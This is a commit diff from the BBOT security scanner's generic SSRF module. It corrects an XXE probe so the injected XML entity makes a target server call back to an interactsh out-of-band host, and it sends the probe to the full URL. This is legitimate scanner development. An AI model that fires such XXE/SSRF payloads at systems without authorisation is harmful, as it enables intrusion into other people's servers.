Merge pull request #1870 from blacklanternsecurity/generic-ssrf-fix

Fixing Bugs with Generic SSRF Payload
blacklanternsecurity · Oct 18, 2024 · 7bbc9e6 · 7bbc9e6
2 parents 37ae382 + 4bd16b7
commit 7bbc9e6
Showing 1 changed file with 2 additions and 2 deletions.
diff --git a/bbot/modules/generic_ssrf.py b/bbot/modules/generic_ssrf.py
@@ -137,10 +137,10 @@ async def test(self, event):
         post_body = f"""<?xml version="1.0" encoding="ISO-8859-1"?>
 <!DOCTYPE foo [
 <!ELEMENT foo ANY >
-<!ENTITY % {rand_entity} SYSTEM "http://{subdomain_tag}.{self.parent_module.interactsh_domain}" >
+<!ENTITY {rand_entity} SYSTEM "http://{subdomain_tag}.{self.parent_module.interactsh_domain}" >
 ]>
 <foo>&{rand_entity};</foo>"""
-        test_url = f"{event.parsed_url.scheme}://{event.parsed_url.netloc}/"
+        test_url = event.parsed_url.geturl()
         r = await self.parent_module.helpers.curl(
             url=test_url, method="POST", raw_body=post_body, headers={"Content-type": "application/xml"}
         )